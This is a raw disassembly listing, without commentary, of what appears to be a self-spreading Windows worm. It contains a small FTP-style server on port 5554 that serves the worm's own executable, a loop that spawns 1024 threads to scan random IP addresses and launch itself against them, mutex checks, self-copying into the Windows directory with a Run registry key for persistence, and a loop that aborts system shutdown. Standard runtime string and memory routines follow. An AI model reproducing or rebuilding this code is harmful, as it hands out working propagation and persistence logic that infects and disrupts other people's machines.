mov ebx, [ebp+hostshort]
loc_401B46: ; CODE XREF: StartAddress+39�j
push 0 ; flags
lea eax, [ebp+buf]
push 400h ; len
push eax ; buf
push ebx ; s
call recv ; recv
and [ebp+eax+buf], 0
mov [ebp+var_10], eax
lea eax, [ebp+buf]
push offset aUser ; "USER"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401B97
push 0
push off_4068D4
call sub_402210
pop ecx
push eax
push off_4068D4
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401B97: ; CODE XREF: StartAddress+73�j
lea eax, [ebp+buf]
push offset aPass ; "PASS"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401BC8
push 0
push off_4068D8
call sub_402210
pop ecx
push eax
push off_4068D8
jmp loc_401E11
; ---------------------------------------------------------------------------
loc_401BC8: ; CODE XREF: StartAddress+A4�j
lea eax, [ebp+buf]
push offset aPort ; "PORT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401CA4
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
mov ax, word_406A60
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402680
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C17: ; CODE XREF: StartAddress+159�j
test ebx, ebx
jz short loc_401C4B
cmp edi, 4
jge short loc_401C2E
push ebx
call sub_401E30
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C2E: ; CODE XREF: StartAddress+116�j
jnz short loc_401C3A
push ebx
call sub_401E30
pop ecx
mov [ebp+var_18], eax
loc_401C3A: ; CODE XREF: StartAddress:loc_401C2E�j
cmp edi, 5
jnz short loc_401C4E
push ebx
call sub_401E30
pop ecx
mov [ebp+var_14], eax
jmp short loc_401C4E
; ---------------------------------------------------------------------------
loc_401C4B: ; CODE XREF: StartAddress+111�j
push 6
pop edi
loc_401C4E: ; CODE XREF: StartAddress+135�j
; StartAddress+141�j
lea eax, [ebp+var_4]
push eax
push 0
call sub_402680
inc edi
pop ecx
cmp edi, 6
pop ecx
mov ebx, eax
jl short loc_401C17
push [ebp+var_2C]
mov edi, [ebp+var_18]
lea eax, [ebp+var_60]
push [ebp+var_30]
shl edi, 8
push [ebp+var_34]
add edi, [ebp+var_14]
push [ebp+var_38]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax ; LPSTR
call wsprintfA ; wsprintfA
add esp, 18h
push 0
push off_4068E0
call sub_402210
pop ecx
push eax
push off_4068E0
jmp loc_401DD7
; ---------------------------------------------------------------------------
loc_401CA4: ; CODE XREF: StartAddress+D5�j
lea eax, [ebp+buf]
push offset aRetr ; "RETR"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0 ; flags
push off_4068E4
call sub_402210
pop ecx
push eax ; len
push off_4068E4 ; buf
push ebx ; s
call esi ; send
lea eax, [ebp+var_60]
push eax ; name
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h
lea eax, [ebp+name]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push edi ; hostshort
call htons ; htons
push 0 ; protocol
push 1 ; type
push 2 ; af
mov word ptr [ebp+name.sa_data], ax
mov dword ptr [ebp+name.sa_data+2], ebx
call socket ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+s], ebx
jz loc_401DB9
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push ebx ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx ; s
call closesocket ; closesocket
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: StartAddress+231�j
lea eax, [ebp+PathName]
push 400h ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+PathName]
push 0 ; iReadWrite
push eax ; lpPathName
call _lopen ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+hFile], eax
jz short loc_401DB9
lea eax, [ebp+Buffer]
push offset byte_406F38
push eax
call sub_402720
mov ebx, _hread
pop ecx
pop ecx
lea eax, [ebp+Buffer]
push 1 ; lBytes
push eax ; lpBuffer
push [ebp+hFile] ; hFile
loc_401D8E: ; CODE XREF: StartAddress:loc_401DAE�j
call ebx ; _hread
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0 ; flags
push eax ; len
lea eax, [ebp+Buffer]
push eax ; buf
push [ebp+s] ; s
call esi ; send
lea eax, [ebp+Buffer]
push 1
push eax
push [ebp+hFile]
loc_401DAE: ; DATA XREF: .rsrc:0040A41D�r
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: StartAddress+28B�j
push [ebp+hFile] ; hFile
call _lclose ; _lclose
loc_401DB9: ; CODE XREF: StartAddress+1DD�j
; StartAddress+21B�j ...
push [ebp+s] ; s
call closesocket ; closesocket
push 0
push off_4068DC
call sub_402210
pop ecx
push eax
push off_4068DC
loc_401DD7: ; CODE XREF: StartAddress+197�j
push [ebp+hostshort]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: StartAddress+1B1�j
lea eax, [ebp+buf]
push offset aQuit ; "QUIT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx ; s
call closesocket ; closesocket
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: StartAddress+2E9�j
push 0 ; flags
push off_4068DC
call sub_402210
pop ecx
push eax ; len
push off_4068DC ; buf
loc_401E11: ; CODE XREF: StartAddress+8A�j
; StartAddress+BB�j
push ebx ; s
loc_401E12: ; CODE XREF: StartAddress+2D2�j
call esi ; send
loc_401E14: ; CODE XREF: StartAddress+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+hostshort] ; s
call closesocket ; closesocket
pop edi
pop esi
loc_401E29: ; CODE XREF: StartAddress+10�j
xor eax, eax
pop ebx
leave
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: StartAddress+119�p
; StartAddress+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax ; CharType
call sub_402810
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_401E65(LPVOID)
sub_401E65 proc near ; DATA XREF: sub_402029+79�o
name = sockaddr ptr -14h
ThreadId = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h ; hostshort
mov [ebp+name.sa_family], 2
call htons ; htons
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
mov dword ptr [ebp+name.sa_data+2], esi
call bind ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5 ; backlog
push edi ; s
call listen ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi ; s
call closesocket ; closesocket
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi ; addrlen
push esi ; addr
push edi ; s
call accept ; accept
lea ecx, [ebp+ThreadId]
push ecx ; lpThreadId
push esi ; dwCreationFlags
push eax ; lpParameter
push offset StartAddress ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call CreateThread ; CreateThread
push 19h ; dwMilliseconds
call Sleep ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_401EF0(LPVOID)
sub_401EF0 proc near ; DATA XREF: sub_402029+8D�o
var_454 = byte ptr -454h
cp = byte ptr -438h
CmdLine = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, wsprintfA
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+cp]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+cp]
push eax ; cp
call inet_addr ; inet_addr
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+var_454]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax ; LPSTR
call ebp ; wsprintfA
add esp, 18h
lea eax, [esp+464h+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+CmdLine]
push 400h ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
lea eax, [esp+464h+CmdLine]
push offset asc_406A7C ; " "
push eax
call sub_402730
lea eax, [esp+46Ch+var_454]
push eax
lea eax, [esp+470h+CmdLine]
push eax
call sub_402730
add esp, 10h
lea eax, [esp+464h+CmdLine]
push 0 ; uCmdShow
push eax ; lpCmdLine
call WinExec ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h ; dwMilliseconds
call Sleep ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_402029(int, int, DWORD s, int)
sub_402029 proc near ; CODE XREF: .text:00402907�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
ThreadId = dword ptr -4
s = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, CreateMutexA
xor esi, esi
push offset Name ; "Jobaka3"
push esi ; bInitialOwner
push esi ; lpMutexAttributes
call edi ; CreateMutexA
call GetTickCount ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+s]
call sub_402210
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+s] ; s
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: sub_402029+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_402029+35�j
push 1 ; lpName
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi ; bInitialOwner
push esi ; lpMutexAttributes
call edi ; CreateMutexA
call GetLastError
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: sub_402029+66�j
mov edi, CreateThread
lea eax, [ebp+ThreadId]
push ebx
push eax ; lpThreadId
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_401E65 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call edi ; CreateThread
mov ebx, 400h
loc_4020B0: ; CODE XREF: sub_402029+97�j
lea eax, [ebp+var_8]
push eax ; lpThreadId
push esi ; dwCreationFlags
push esi ; lpParameter
push offset sub_401EF0 ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
call edi ; CreateThread
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: sub_402029+AC�j
push esi ; lpMachineName
call AbortSystemShutdownA ; AbortSystemShutdownA
push 0BB8h ; dwMilliseconds
call Sleep ; Sleep
jmp short loc_4020C3
sub_402029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: sub_402029+4B�p
ExistingFileName= byte ptr -824h
var_425 = byte ptr -425h
NewFileName = byte ptr -424h
hKey = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+ExistingFileName]
push esi ; nSize
push eax ; lpFilename
push 0 ; hModule
call GetModuleFileNameA ; GetModuleFileNameA
lea eax, [ebp+NewFileName]
push esi ; uSize
push eax ; lpBuffer
call GetWindowsDirectoryA ; GetWindowsDirectoryA
lea eax, [ebp+NewFileName]
push eax
call sub_402210
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+NewFileName]
push offset asc_406ACC ; "\\"
push eax
call sub_402730
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push lpValueName
lea eax, [ebp+NewFileName]
push eax
call sub_402730
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+NewFileName]
push 0 ; bFailIfExists
push eax ; lpNewFileName
lea eax, [ebp+ExistingFileName]
push eax ; lpExistingFileName
call CopyFileA ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+hKey]
push eax ; phkResult
push offset SubKey ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h ; hKey
call RegOpenKeyA ; RegOpenKeyA
lea eax, [ebp+NewFileName]
push eax
call sub_402210
pop ecx
push eax ; cbData
lea eax, [ebp+NewFileName]
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
push lpValueName ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExA ; RegSetValueExA
push [ebp+hKey] ; hKey
call RegCloseKey ; RegCloseKey
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021B0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402203
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4021F7
neg ecx
and ecx, 3
jz short loc_4021D9
sub edx, ecx
loc_4021D3: ; CODE XREF: sub_4021B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4021D3
loc_4021D9: ; CODE XREF: sub_4021B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4021F7
rep stosd
test edx, edx
jz short loc_4021FD
loc_4021F7: ; CODE XREF: sub_4021B0+18�j
; sub_4021B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4021F7
loc_4021FD: ; CODE XREF: sub_4021B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402203: ; CODE XREF: sub_4021B0+A�j
mov eax, [esp+arg_0]
retn
sub_4021B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402230
loc_40221C: ; CODE XREF: sub_402210+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402263
test ecx, 3
jnz short loc_40221C
add eax, 0
loc_402230: ; CODE XREF: sub_402210+A�j
; sub_402210+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402230
mov eax, [ecx-4]
test al, al
jz short loc_402281
test ah, ah
jz short loc_402277
test eax, 0FF0000h
jz short loc_40226D
test eax, 0FF000000h
jz short loc_402263
jmp short loc_402230
; ---------------------------------------------------------------------------
loc_402263: ; CODE XREF: sub_402210+11�j
; sub_402210+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40226D: ; CODE XREF: sub_402210+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402277: ; CODE XREF: sub_402210+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_402210+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402290 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
loc_4022A0: ; DATA XREF: sub_40AD5A+2E�w
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4022B0
cmp edi, eax
jb loc_402428
loc_4022B0: ; CODE XREF: sub_402290+16�j
test edi, 3
jnz short loc_4022CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_402290+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4022E4
and eax, 3
add ecx, eax
jmp dword ptr loc_4022EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4022E4: ; CODE XREF: sub_402290+46�j
jmp dword ptr loc_4023E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4022EC: ; CODE XREF: sub_402290+31�j
; sub_402290+8E�j ...
jmp off_40236C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
db 0, 23h, 40h
dword_4022F7 dd 40232C00h ; sub_40ACEB+29�r
align 4
push eax
and eax, [eax+0]
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40236C dd offset loc_4023CF ; DATA XREF: sub_402290:loc_4022EC�r
dd offset loc_4023BC
dd offset loc_4023B4
dd offset loc_4023AC
dd offset loc_4023A4
dd offset loc_40239C
dd offset loc_402394
dd offset loc_40238C
; ---------------------------------------------------------------------------
loc_40238C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402394: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40239C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4023A4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4023AC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4023B4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4023BC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4023CF: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290:off_40236C�o
jmp off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4023D8 dd offset loc_4023E8 ; DATA XREF: sub_402290+35�r
; sub_402290+92�r ...
dd offset loc_4023F0
dd offset loc_4023FC
dd offset loc_402410
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4023FC: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402410: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402428: ; CODE XREF: sub_402290+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40245C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402450: ; CODE XREF: sub_402290+1B1�j
; sub_402290+208�j ...
neg ecx
jmp off_402520[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40245C: ; CODE XREF: sub_402290+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402474
and eax, 3
sub ecx, eax
jmp dword ptr loc_402474+4[eax*4]
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402290+1D6�j
; DATA XREF: sub_402290+1DD�r
jmp off_402570[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [eax+eax*2], ah
add [eax-2FFFBFDCh], ch
and al, 40h
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
db 8Ah
byte_4024D1 db 46h ; DATA XREF: sub_40AED2+8�w
; sub_40AED2+37�r
dw 2303h
dd 34788D1h, 8802468Ah, 468A0247h, 2E9C101h, 83014788h
dd 0EF8303EEh, 8F98303h, 0FF5A820Fh, 0F3FDFFFFh, 24FFFCA5h
dd 40257095h, 498D00h, 402524h, 40252Ch, 402534h, 40253Ch
dd 402544h, 40254Ch, 402554h
off_402520 dd offset loc_402567 ; DATA XREF: sub_402290+1C2�r
; ---------------------------------------------------------------------------
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402567: ; CODE XREF: sub_402290+1C2�j
; DATA XREF: sub_402290:off_402520�o
jmp off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402570 dd offset loc_402580 ; DATA XREF: sub_402290+1B7�r
; sub_402290:loc_402474�r ...
dd offset loc_402588
dd offset loc_402598
dd offset loc_4025AC
; ---------------------------------------------------------------------------
loc_402580: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402588: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402598: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4025AC: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: sub_40159E+8�p
; sub_40371C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4025F0
loc_4025DC: ; CODE XREF: sub_4025D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4025DC
loc_4025F0: ; CODE XREF: sub_4025D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4025D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402600 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40267A
mov dh, [ecx+1]
test dh, dh
jz short loc_402667
loc_402618: ; CODE XREF: sub_402600+52�j
; sub_402600+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40263A
test al, al
jz short loc_402634
loc_402629: ; CODE XREF: sub_402600+32�j
mov al, [esi]
inc esi
loc_40262C: ; CODE XREF: sub_402600+3F�j
cmp al, dl
jz short loc_40263A
test al, al
jnz short loc_402629
loc_402634: ; CODE XREF: sub_402600+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_402600+23�j
; sub_402600+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40262C
lea edi, [esi-1]
loc_402644: ; CODE XREF: sub_402600+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402673
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402618
mov al, [ecx+3]
test al, al
jz short loc_402673
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402644
jmp short loc_402618
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_402600+16�j
xor eax, eax
pop esi
